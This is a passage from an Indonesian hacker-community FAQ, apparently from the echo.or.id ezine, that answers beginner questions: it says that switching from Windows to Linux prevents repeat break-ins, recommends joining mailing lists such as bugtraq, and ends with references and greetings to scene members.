[1] T : Saya dicrack. Maukah Anda menolong saya mencegah serangan berikutnya?
J : Tidak. Setiap kali saya ditanya pertanyaan di atas sejauh ini, ternyata penanyanya seseorang yang menggunakan Microsoft Windows. Tidak mungkin secara efektif melindungi sistem Windows dari serangan crack; kode dan arsitektur Windows terlalu banyak mengandung cacat, sehingga berusaha mengamankan Windows seperti berusaha menyelamatkan kapal yang bocor dengan saringan. Satu-satunya cara pencegahan yang andal adalah berpindah ke Linux atau sistem operasi lain yang setidaknya dirancang untuk keamanan.

T : Apakah saya perlu komunitas ?
J : YUPE , komunitas sangat kamu perlukan, apalagi jika kamu memilih untuk berkecimpung di dunia opensource, banyak milis yang bisa kamu ikuti, sebaiknya ikuti milis yang
spesifik sesuai dengan yang kamu gunakan. (misal linux, sesuai distro )

T : Apakah termasuk milis sekuriti ?
J : iyah ! cobalah bugtraq@securityfocus.com

ReFerensi :

[0]. *RFC1392,Internet User Glossary
[1]. How to Become A Hacker – Eric S Raymond Terjemahan Indonesia dari How To Become A Hacker – Steven Haryanto
[2]. Ezine at http://ezine.echo.or.id
[3]. Milis Newbie_hacker@yahoogroups.com
[4]. #e-c-h-o room @t DALNET
. Pendapat pribadi , hasil diskusi, MIlis lain , forum, Chatting

*greetz to:
[echostaff : triplezix, moby, comex, the_Day, z3r0byt3, K-159, c-a-s-e, S'to]
{ISICteam : yudhax, anton, balai_melayu, wisnu, biatch-X },

anak anak newbie_hacker[at]yahoogroups.com , #e-c-h-o , #aikmel

kirimkan kritik && saran ke y3dips[at]echo.or.id